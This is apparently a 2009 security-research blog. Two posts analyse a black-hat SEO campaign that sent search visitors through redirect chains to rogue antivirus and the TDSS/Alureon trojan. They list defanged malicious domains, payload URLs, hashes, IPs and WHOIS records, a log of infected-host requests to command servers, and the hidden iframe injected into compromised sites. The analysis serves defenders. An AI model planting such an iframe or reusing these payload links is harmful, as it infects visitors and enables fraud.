Friday, April 24, 2009

Black Hat SEO and Rogue Antivirus p.9

The silent threat: Black Hat SEO and Rogue Antivirus

Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more

READ THIS page if you need more information

After Trend Micro researchers claimed that Easter related sites were used to
redirect visitors to rogue antivirus websites, PandaLabs recently uncovered
similar Black hat SEO attacks against Ford and Ned.org.

By mis-using keywords typically related to global businesses and institutions,
the criminals attract unsuspecting visitors to compromized web sites. These sites
deceive visitors into downloading and installing a fake antivirus product that is
very hard to deactivate or remove.The rogue antivirus gives false alerts to the
user making them think that theircomputer is infected. Scared users are then
susceptible to buying the "antivirus protection" via a page that looks like a
secure SSL web site. In fact, their money are confidential credit card information
are stolen by the criminals the moment that they enter their personal information
into the payment page.

Many global companies, including Ford have been exploited in this way. Over a
million compromized web sites used Ford-based keywords to attract visitors to
fake antivirussites via search engines such as Google (Black hat SEO may force
Google to change algorithm
).Other examples of this attack include the mis-use
of Easter related keywords to attract unsuspecting visitors during the Easter
season (Trend Micro Malware Blog - Rotten Eggs: An Easter Malware Campaign).

There are other variants of this type of attack originating from the same
Ukraine / Russianbased criminal fraternity. For example, the criminals use technical
exploits to compromizeweb sites, blog, forums and the like. Wordpress blog
management software has been a victim of such an exploit allowing the criminals
to inject malicious code directly into all pages.A visitor to one of these infected
sites will beredirected to another site where rogue antivirus software is again
downloaded (PandaLabs: New Blackhat SEO attack exploits vulnerabilities in
Wordpressto distributerogue antivirus software
).

The criminals put a lot of effort into assuring the longevity of their scam.
Frequent IP changes and moving from location to location help ensure that
they can continue their activities.

You can get more information about all these attacks from the following
resources. The PandaLabs video gives a particularly clear and concise overview.

The following links provide more information about this attack:

The Tech Herald: Malicious SEO targets Ford Motor Company
PandaLabs
: Targeted Blackhat SEO Attack against Ford Motor Co.

Read the article on WebProNews: Blackhat SEO spammers force Google’s hand


Related attack:

PandaLabs
: Blackhat SEO Fueled Rogue Security Campaign
Sample hijacked search terms (text file)

The website implicated is: getscanonline.com (also hosted on 209.44.126.14).

Softpedia: Easter and Ford Search Results Poisoned

In this case, the files found on the site are detected by Trend Micro as

TROJ_FAKEAV.BAF
- JS_DLOADER.WKQ

The websites in question are: trustsecurityshield.com and topsecurity4you.com
which both have served for only two or three days (hosted on 209.44.126.14).



Technicals details can be found below


Vulnerabilities in Wordpress exploited to distribute rogue antivirus software

Watch the full video:



I will take your attention on the video above.

This is a screenshot at 03:11

If you zoom into it you will see the domain "load-archive-av-pro.com".
The domain is still active and shared with many other fake scanner websites
like "antivir-scan-pro-best.com" for the location of the payload.
Wepawet Analysis




The process:

I will take some words found on Ned.org for example.


The google cache:



The poisoned keywords:

"Kettle Vally Line Song"


The google search:



The redirection analysis:

hxxp://cropperddi.fortunecity.com/6766.html
hxxp://sandbergjbo.fortunecity.com/26894.html

Analysis -> redirect to a traffic management system
Analysis -> redirect to a traffic management system

hxxp://redirxl.com/filt/in.cgi?5&group=5q

which then redirect to the malicious site

hxxp://antivir-scan-pro-best.com/11038/3/

The payload in located on the same site that appear on the
PandaLabs article which is:

hxxp://files.load-archive-av-pro.com/normal/
setup_11038_3_1.exe


File size: 104971 bytes
MD5...: 2a9889219ec9d0124892e5e64eaed2bd

VirusTotal
Anubis

---------------------------

64.69.32.220

antivir-scan-pro-best.com

Registrant: Lee Brinkman (leebrinkm@gmail.com)
4396 Ross Street
Mount Vernon
Illinois,62864
US
Tel. +001.65746675653

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.antivir-scan-pro-best.com
ns1.antivir-scan-pro-best.com


Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

checker-pc-pro-av.com
sheck-pro-as.com


---------------------------

195.88.80.127 - ECOWEB AS35695 - ecoweb.lv

load-archive-av-pro.com
files.load-archive-av-pro.com

Registrant:Mary Smalls (mary.sma0@gmail.com)
2251 Doctors Drive
Los Angeles
California,90066
US
Tel. +001.86758776498

Creation Date: 17-Apr-2009
Expiration Date: 17-Apr-2010

Domain servers in listed order:
ns2.load-archive-av-pro.com
ns1.load-archive-av-pro.com

Registrar:
DIRECTI INTERNET SOLUTIONS PVT. LTD.
D/B/A PUBLICDOMAINREGISTRY.COM

Also on this IP - previously used

download-pro-as.net
load-antivir-pro-pc.com
files.load-antivir-pro-pc.com
download-pro-as.net






From the article on PandaLabs' blog about the SEO attack against
Ford Motor Co. you can see the domain "globextubes.com"
previously hosted on 64.69.32.203.

This is a graph (from Robtex) of some of these sites serving in
the same campaign:

fasttube2009.com
globalstube2009.com
globextubes.com
streamingtubes2009.com




This is a file found on one of these site: softwarefortubeview.40011.exe

VirusTotal Report
Anubis Report



Complete analysis below:

After running it connect to this URL to received additional payloads to inject.

nhgfngfdhngf.com - 216.240.148.9

ThreatExpert Report

hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&uid=00cd1a40d41d8
cd98f00b204e9800998ecf8427e&os=512

hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&uid=00cd1a40d41d
8cd98f00b204e9800998ecf8427e&os=512

(216.240.148.9)


The page show these URL (Added file info and virustotal report)

----------------------------------------------------
hxxp://images2009best.com/perce/
30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230
740e19c810803919c83e9c9f487472375ee/70e/perce.jpg

VirusTotal - 4/40 (10%)
Anubis Report
File size: 94212 bytes
MD5...: e49048a38d0757b92a34dff6fc3b3f74

HTTP Activity:


----------------------------------------------------

hxxp://venerapictures.com/item/6000dc4d413ac4f08d
c431fdc85ccde9d80ff0a04b824084feb9c840903939083e0
c4f78441277ced/b0b/item.gif

VirusTotal - 7/40 (17.5%)
Anubis Report
File size: 145412 bytes
MD5...: d2b451fee4f7c42b06121cf03f8ea281

----------------------------------------------------
hxxp://venerapictures.com/werber/900/216.jpg

VirusTotal - 8/40 (20%)
Anubis Report
File size: 99332 bytes
MD5...: 5bc8a73f3412c574909e5f3c193fed89

----------------------------------------------------
hxxp://files.get-fails-load-av.com/exe/setup_200002.exe

VirusTotal - 9/40 (22.5%)
Anubis Report
File size: 78347 bytes
MD5...: ff220534519a1a116dbc2dd712bff24a

HTTP Activity:


----------------------------------------------------

hxxp://lwl-softwares.com/939.exe

VirusTotal - 0/39 (0%)
Anubis Report
File size: 180224 bytes
MD5...: 1ff562c02c68f0a8001135dc89b4eaa1

HTTP Activity:



----------------------------------------------------

hxxp://lwl-softwares.com/important.exe

Anubis Report
File size: 135168 byte
MD5...: 83b4560333601224cb0d5709bdf57191

Trojan.Win32.Tibs

 

Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.

All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below)


Check it out - maybe someone have access to your PC right now! Protect yourself.

Also Google show 14,800 result for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving for the fake antivirus campaign:

209.44.126.14

activesecurityshield.com
anytoplikedsite.com
basevirusscan.com
bestfiresfull.com
bestsecurityupdate.com
checkonlinesecurity.com
cleanyourpcspace.com
destroyvirusnow.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
fuc*moneycash.com
fullandtotalsecurity.com
fullsecurityshield.com
getpcguard.com
getscanonline.com
getsecuritywall.com
greatsecurityshield.com
inetsecuritycenter.com
initialsecurityscan.com
mostpopularscan.com
myfirstsecurityscan.com
mytoplikedsite.com
mytopvirusscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
runpcscannow.com
scanalertspage.com
scanbaseonline.com
scanprotectiononline.com
scanvistanow.net
securityscan4you.com
securitytopagent.com
thegreatsecurity.com
todaybestscan.com
topsecurity4you.com
topsecurityapp.com
topsoftscanner.com
totalpcdefender.com
totalvirusdestroyer.com
truescansecurity.com
trustsecurityshield.com
upyoursecurity.com
virustopshield.com
vistastabilitynow.com
vistastabilitynow.net
websecuritymaster.com
websecurityvoice.com
yourstabilitysystem.com

209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23


NS for rogue fake av websites

209.44.126.32
asmmnation.com
ThreatExpert report
In conjunction with an IP in ukraine : Symantec write up



On this IP 209.44.126.29 we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).

I will take this domain for example "individualpeople[.]biz"

Malicious script (IFRAME) inserted. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below which host several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

to finally load this page

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"


IPs implicated:

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23
209.44.126.29
209.44.126.32

Other domain in conjunction can be found using ThreatExpert

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report